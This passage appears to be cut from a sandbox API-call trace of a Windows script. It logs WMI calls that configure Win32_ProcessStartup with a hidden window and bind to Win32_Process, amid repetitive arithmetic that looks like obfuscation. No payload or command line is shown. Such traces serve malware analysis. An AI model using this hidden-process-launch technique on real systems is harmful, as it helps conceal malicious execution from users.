This=0xd113c48, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145fb8 | out: ppvObject=0x145fb8*=0xafa42d0) returned 0x0 [0070.575] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xafa42d0, pProxy=0xd113c48, pAuthnSvc=0x145fb0, pAuthzSvc=0x145ff8, pServerPrincName=0x0, pAuthnLevel=0x146048, pImpLevel=0x146000, pAuthInfo=0x0, pCapabilites=0x145fe8 | out: pAuthnSvc=0x145fb0*=0xa, pAuthzSvc=0x145ff8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x146048*=0x6, pImpLevel=0x146000*=0x2, pAuthInfo=0x0, pCapabilites=0x145fe8*=0x1) returned 0x0 [0070.575] WbemLocator:IUnknown:Release (This=0xafa42d0) returned 0x1 [0070.575] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.575] GetCurrentThreadId () returned 0x8ec [0070.575] WbemLocator:IUnknown:QueryInterface (in: This=0xd113c48, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x146010 | out: ppvObject=0x146010*=0xafa42d0) returned 0x0 [0070.576] WbemLocator:IClientSecurity:CopyProxy (in: This=0xafa42d0, pProxy=0xd113c48, ppCopy=0x146008 | out: ppCopy=0x146008*=0xd113fe8) returned 0x0 [0070.576] WbemLocator:IUnknown:QueryInterface (in: This=0xd113fe8, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145ec0 | out: ppvObject=0x145ec0*=0xafa42d0) returned 0x0 [0070.576] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xafa42d0, pProxy=0xd113fe8, pAuthnSvc=0x145f60, pAuthzSvc=0x145f10, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x145f60*=0xa, pAuthzSvc=0x145f10*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0070.576] WbemLocator:IUnknown:Release (This=0xafa42d0) returned 0x3 [0070.576] WbemLocator:IUnknown:QueryInterface (in: This=0xd113fe8, riid=0x7fee2a81568*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145e80 | out: ppvObject=0x145e80*=0xafa4310) returned 0x0 [0070.577] WbemLocator:IUnknown:QueryInterface (in: This=0xd113fe8, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145ec0 | out: ppvObject=0x145ec0*=0xafa42d0) returned 0x0 [0070.588] WbemLocator:IClientSecurity:SetBlanket (This=0xafa42d0, pProxy=0xd113fe8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0070.588] WbemLocator:IUnknown:Release (This=0xafa42d0) returned 0x4 [0070.588] WbemLocator:IUnknown:Release (This=0xafa4310) returned 0x3 [0070.589] WbemLocator:IUnknown:Release (This=0xafa42d0) returned 0x2 [0070.589] WbemLocator:IUnknown:AddRef (This=0xd113fe8) returned 0x3 [0070.589] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd114000 [0070.589] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1140a0 [0070.589] WbemLocator:IUnknown:Release (This=0xd113c48) returned 0x2 [0070.589] WbemLocator:IUnknown:QueryInterface (in: This=0xd113fe8, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1461a8 | out: ppvObject=0x1461a8*=0xafa42d0) returned 0x0 [0070.589] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xafa42d0, pProxy=0xd113fe8, pAuthnSvc=0x1461a0, pAuthzSvc=0x1461e8, pServerPrincName=0x0, pAuthnLevel=0x146210, pImpLevel=0x146208, pAuthInfo=0x0, pCapabilites=0x1461d8 | out: pAuthnSvc=0x1461a0*=0xa, pAuthzSvc=0x1461e8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x146210*=0x6, pImpLevel=0x146208*=0x3, pAuthInfo=0x0, pCapabilites=0x1461d8*=0x20) returned 0x0 [0070.589] WbemLocator:IUnknown:Release (This=0xafa42d0) returned 0x2 [0070.589] WbemDefPath:IWbemPath:GetInfo (in: This=0xd101670, uRequestedInfo=0x0, puResponse=0x146210 | out: puResponse=0x146210*=0xc15) returned 0x0 [0070.589] WbemDefPath:IWbemPath:GetText (in: This=0xd101670, lFlags=2, puBuffLength=0x146240*=0x0, pszText=0x0 | out: puBuffLength=0x146240*=0x15, pszText=0x0) returned 0x0 [0070.589] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1140e0 [0070.589] WbemDefPath:IWbemPath:GetText (in: This=0xd101670, lFlags=2, puBuffLength=0x146240*=0x15, pszText="Řഐ" | out: puBuffLength=0x146240*=0x15, pszText="Win32_ProcessStartup") returned 0x0 [0070.589] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.589] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.589] GetCurrentThreadId () returned 0x8ec [0070.590] WbemLocator:IUnknown:AddRef (This=0xd113fe8) returned 0x3 [0070.590] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.590] GetCurrentThreadId () returned 0x8ec [0070.590] IWbemServices:GetObject (in: This=0xd113fe8, strObjectPath="Win32_ProcessStartup", lFlags=0, pCtx=0x0, ppObject=0x146208*=0x0, ppCallResult=0x0 | out: ppObject=0x146208*=0xd114d20, ppCallResult=0x0) returned 0x0 [0070.608] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd115090 [0070.608] IUnknown:AddRef (This=0xd114d20) returned 0x2 [0070.608] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd115110 [0070.608] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1151c0 [0070.608] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd115260 [0070.608] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd115300 [0070.608] WbemLocator:IUnknown:AddRef (This=0xd113fe8) returned 0x4 [0070.608] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe [0070.608] IUnknown:AddRef (This=0xd114d20) returned 0x3 [0070.608] IUnknown:Release (This=0xd114d20) returned 0x2 [0070.608] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x146160 | out: pperrinfo=0x146160*=0x0) returned 0x1 [0070.608] WbemLocator:IUnknown:Release (This=0xd113fe8) returned 0x3 [0070.608] CreatePointerMoniker (in: punk=0xd115090, ppmk=0x1464b0 | out: ppmk=0x1464b0*=0x65f9a70) returned 0x0 [0070.608] IUnknown:AddRef (This=0xd115090) returned 0x2 [0070.609] WbemLocator:IUnknown:Release (This=0xd113fe8) returned 0x2 [0070.609] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.609] WbemLocator:IUnknown:Release (This=0xd1014e0) returned 0x0 [0070.609] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.609] WinMGMTS:IUnknown:Release (This=0xd1013d0) returned 0x0 [0070.609] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.609] BindMoniker (in: pmk=0x65f9a70, grfOpt=0x0, iidResult=0x7fee3b17890*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x146538 | out: ppvResult=0x146538*=0xd115090) returned 0x0 [0070.609] IUnknown:QueryInterface (in: This=0xd115090, riid=0x7fee3b17890*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x146538 | out: ppvObject=0x146538*=0xd115090) returned 0x0 [0070.609] IUnknown:Release (This=0x65f9a70) returned 0x0 [0070.609] IUnknown:Release (This=0xd115090) returned 0x1 [0070.610] VarCmp (pvarLeft=0xaefec10, pvarRight=0xaefebf8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.610] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefebe0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] sqrt (_X=0x3) returned 0x41c0000000000000 [0070.610] VarDiv (in: pvarLeft=0xaefebb0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.610] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.610] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefeb38, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] VarCmp (pvarLeft=0xaefeb08, pvarRight=0xaefeaf0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.610] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefead8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] sqrt (_X=0x3) returned 0x41c0000000000000 [0070.610] VarDiv (in: pvarLeft=0xaefeaa8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.610] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.610] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefea30, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] VarCmp (pvarLeft=0xaefea00, pvarRight=0xaefe9e8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.610] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe9d0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] sqrt (_X=0x3) returned 0x41b0000000000000 [0070.610] VarDiv (in: pvarLeft=0xaefe9a0, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.610] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.610] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe928, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] VarAdd (in: pvarLeft=0xaefe8f8, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.610] VarSub (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.610] VarAdd (in: pvarLeft=0xaeff620, pvarRight=0xaefe8e0, pvarResult=0xaeff5f0 | out: pvarResult=0xaeff5f0) returned 0x0 [0070.610] LoadRegTypeLib (in: rguid=0x7fee2a817a8*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x1464d0*=0x0 | out: pptlib=0x1464d0*=0x3f14330) returned 0x0 [0070.629] ITypeLib:GetTypeInfoOfGuid (in: This=0x3f14330, GUID=0x7fee2a81908, ppTInfo=0xd112c10 | out: ppTInfo=0xd112c10*=0xaff2848) returned 0x0 [0070.629] IUnknown:Release (This=0x3f14330) returned 0x1 [0070.629] IUnknown:AddRef (This=0xaff2848) returned 0x2 [0070.629] DispGetIDsOfNames (in: ptinfo=0xaff2848, rgszNames=0x1465c0*="ShowWindow", cNames=0x1, rgdispid=0x1465a4 | out: rgdispid=0x1465a4*=-1) returned 0x80020006 [0070.629] IUnknown:AddRef (This=0xd114d20) returned 0x3 [0070.629] IWbemClassObject:Get (in: This=0xd114d20, wszName="ShowWindow", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0x146500*=0 | out: pVal=0x0, pType=0x0, plFlavor=0x146500*=0) returned 0x0 [0070.629] IUnknown:Release (This=0xd114d20) returned 0x2 [0070.629] SysStringLen (param_1="ShowWindow") returned 0xa [0070.629] IWbemClassObject:Get (in: This=0xd114d20, wszName="ShowWindow", lFlags=0, pVal=0x1462f0*(varType=0x0, wReserved1=0xffff, wReserved2=0xffff, wReserved3=0xffff, varVal1=0x7fee2a9a48f, varVal2=0x1800001), pType=0x146340*=0, plFlavor=0x0 | out: pVal=0x1462f0*(varType=0x1, wReserved1=0xffff, wReserved2=0xffff, wReserved3=0xffff, varVal1=0x7fee2a9a48f, varVal2=0x1800001), pType=0x146340*=18, plFlavor=0x0) returned 0x0 [0070.629] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.629] GetCurrentThreadId () returned 0x8ec [0070.630] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd114000 [0070.630] IUnknown:AddRef (This=0xd114d20) returned 0x3 [0070.630] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101370 [0070.630] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.630] GetCurrentThreadId () returned 0x8ec [0070.630] IWbemClassObject:Get (in: This=0xd114d20, wszName="ShowWindow", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0x146298*=0 | out: pVal=0x0, pType=0x0, plFlavor=0x146298*=0) returned 0x0 [0070.630] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd113c60 [0070.630] IUnknown:AddRef (This=0xd114d20) returned 0x4 [0070.630] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1118f0 [0070.630] LoadRegTypeLib (in: rguid=0x7fee2a817a8*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x1461c8*=0x0 | out: pptlib=0x1461c8*=0x3f14330) returned 0x0 [0070.634] ITypeLib:GetTypeInfoOfGuid (in: This=0x3f14330, GUID=0xd113cc0, ppTInfo=0xd113ca8 | out: ppTInfo=0xd113ca8*=0xaff29a8) returned 0x0 [0070.634] IUnknown:Release (This=0x3f14330) returned 0x3 [0070.634] IUnknown:AddRef (This=0xaff29a8) returned 0x2 [0070.634] ITypeInfo:LocalInvoke (This=0xaff29a8) returned 0x0 [0070.634] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.634] GetCurrentThreadId () returned 0x8ec [0070.634] IWbemClassObject:Get (in: This=0xd114d20, wszName="ShowWindow", lFlags=0, pVal=0x0, pType=0x145d30*=0, plFlavor=0x0 | out: pVal=0x0, pType=0x145d30*=18, plFlavor=0x0) returned 0x0 [0070.634] IWbemClassObject:Put (This=0xd114d20, wszName="ShowWindow", lFlags=0, pVal=0x145d00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), Type=18) returned 0x0 [0070.635] IUnknown:Release (This=0xaff29a8) returned 0x1 [0070.635] IUnknown:Release (This=0xd114d20) returned 0x3 [0070.635] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.635] IWbemClassObject:EndEnumeration (This=0xd114d20) returned 0x0 [0070.635] IUnknown:Release (This=0xd114d20) returned 0x2 [0070.635] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.636] VarCmp (pvarLeft=0xaefe8c8, pvarRight=0xaefe8b0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.636] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe898, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.636] sqrt (_X=0x3) returned 0x41c0000000000000 [0070.636] VarDiv (in: pvarLeft=0xaefe868, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.636] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.636] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.636] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe7f0, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.636] VarCmp (pvarLeft=0xaefe7c0, pvarRight=0xaefe7a8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0070.636] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe790, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.636] sqrt (_X=0x3) returned 0x4160000000000000 [0070.636] VarDiv (in: pvarLeft=0xaefe760, pvarRight=0xaeff680, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.636] VarDiv (in: pvarLeft=0xaeff6b0, pvarRight=0xaeff638, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.636] RtlUnwindEx (TargetFrame=0x146660, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x146770, ContextRecord=0x1460d0, HistoryTable=0x0) [0070.636] VarMul (in: pvarLeft=0xaeff680, pvarRight=0xaefe6e8, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaefe6b8, pvarRight=0xaeffd48, pvarResult=0xaeff6b0 | out: pvarResult=0xaeff6b0) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff6b0, pvarRight=0xaefe6a0, pvarResult=0xaeff620 | out: pvarResult=0xaeff620) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff620, pvarRight=0xaefe688, pvarResult=0xaeff5f0 | out: pvarResult=0xaeff5f0) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff5f0, pvarRight=0xaefe670, pvarResult=0xaeff590 | out: pvarResult=0xaeff590) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff590, pvarRight=0xaefe658, pvarResult=0xaeff560 | out: pvarResult=0xaeff560) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaefe628, pvarRight=0xaefe610, pvarResult=0xaeff518 | out: pvarResult=0xaeff518) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff518, pvarRight=0xaefe5f8, pvarResult=0xaeff500 | out: pvarResult=0xaeff500) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaefe5e0, pvarRight=0xaefee98, pvarResult=0xaeff4e8 | out: pvarResult=0xaeff4e8) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff4e8, pvarRight=0xaefe5c8, pvarResult=0xaeff4b8 | out: pvarResult=0xaeff4b8) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff4b8, pvarRight=0xaefe5b0, pvarResult=0xaeff488 | out: pvarResult=0xaeff488) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff488, pvarRight=0xaefe598, pvarResult=0xaeff470 | out: pvarResult=0xaeff470) returned 0x0 [0070.636] VarAdd (in: pvarLeft=0xaeff470, pvarRight=0xaefe580, pvarResult=0xaeff458 | out: pvarResult=0xaeff458) returned 0x0 [0070.636] CreateBindCtx (in: reserved=0x0, ppbc=0x146568 | out: ppbc=0x146568*=0x680aac0) returned 0x0 [0070.637] MkParseDisplayName (in: pbc=0x680aac0, szUserName="winmgmts:Win32_Process", pchEaten=0x146560, ppmk=0x146558 | out: pchEaten=0x146560, ppmk=0x146558*=0x6983270) returned 0x0 [0070.638] DllGetClassObject (in: rclsid=0x41a75f0*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x7fefebbd650*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x146430 | out: ppv=0x146430*=0x0) returned 0x80004002 [0070.638] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101370 [0070.638] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.638] DllGetClassObject (in: rclsid=0x41a75f0*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x145aa8 | out: ppv=0x145aa8*=0xd101370) returned 0x0 [0070.638] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101370 [0070.638] WinMGMTS:IClassFactory:CreateInstance (in: This=0xd101370, pUnkOuter=0x0, riid=0x7fefebbd650*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145af8 | out: ppvObject=0x145af8*=0xd1118f0) returned 0x0 [0070.638] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd1118f0 [0070.639] WinMGMTS:IUnknown:Release (This=0xd101370) returned 0x0 [0070.639] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0070.639] WinMGMTS:IParseDisplayName:ParseDisplayName (in: This=0xd1118f0, pbc=0x680aac0, pszDisplayName="winmgmts:Win32_Process", pchEaten=0x146508, ppmkOut=0x1464b0 | out: pchEaten=0x146508*=0x16, ppmkOut=0x1464b0*=0x6983270) returned 0x0 [0070.639] _wcsnicmp (_String1="winmgmts:", _String2="WINMGMTS:", _MaxCount=0x9) returned 0 [0070.639] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101830 [0070.639] _wcsnicmp (_String1="W", _String2="{", _MaxCount=0x1) returned -4 [0070.639] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd114000 [0070.639] CoCreateInstance (in: rclsid=0x7fee2a81738*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee2a816c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xd114030 | out: ppv=0xd114030*=0xd111aa0) returned 0x0 [0070.639] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd113c60 [0070.639] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd113cf0 [0070.639] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101870 [0070.639] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.639] GetCurrentThreadId () returned 0x8ec [0070.639] _wcsnicmp (_String1="W", _String2="[", _MaxCount=0x1) returned 28 [0070.639] _wcsnicmp (_String1="W", _String2="!", _MaxCount=0x1) returned 86 [0070.639] CoCreateInstance (in: rclsid=0x7fee2a81698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee2a81688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x1462f8 | out: ppv=0x1462f8*=0xd1013d0) returned 0x0 [0070.639] CoCreateInstance (in: rclsid=0x7fee2a81698*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee2a81688*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x146218 | out: ppv=0x146218*=0xd1014d0) returned 0x0 [0070.639] WbemDefPath:IWbemPath:SetText (This=0xd1014d0, uMode=0x4, pszPath="Win32_Process") returned 0x0 [0070.639] WbemDefPath:IUnknown:Release (This=0xd1014d0) returned 0x0 [0070.640] SysStringLen (param_1="Win32_Process") returned 0xd [0070.640] WbemDefPath:IWbemPath:SetText (This=0xd1013d0, uMode=0x4, pszPath="Win32_Process") returned 0x0 [0070.640] WbemLocator:IWbemLocator:ConnectServer (in: This=0xd111aa0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1461f0 | out: ppNamespace=0x1461f0*=0xd115498) returned 0x0 [0070.714] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101560 [0070.714] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd101610 [0070.714] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0xd115d00 [0070.714] WbemLocator:IUnknown:QueryInterface (in: This=0xd115498, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x145fb8 | out: ppvObject=0x145fb8*=0xafa45d0) returned 0x0 [0070.714] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xafa45d0, pProxy=0xd115498, pAuthnSvc=0x145fb0, pAuthzSvc=0x145ff8, pServerPrincName=0x0, pAuthnLevel=0x146048, pImpLevel=0x146000, pAuthInfo=0x0, pCapabilites=0x145fe8 | out: pAuthnSvc=0x145fb0*=0xa, pAuthzSvc=0x145ff8*=0x0, pServerPrincName=0x0, pAuthnLevel=0x146048*=0x6, pImpLevel=0x146000*=0x2, pAuthInfo=0x0, pCapabilites=0x145fe8*=0x1) returned 0x0 [0070.715] WbemLocator:IUnknown:Release (This=0xafa45d0) returned 0x1 [0070.715] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0070.715] GetCurrentThreadId () returned 0x8ec [0070.715] WbemLocator:IUnknown:QueryInterface (in: This=0xd115498, riid=0x7fee2a81628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x146010 | out: ppvObject=0x146010*=0xafa45d0) returned 0x0 [0070.715] 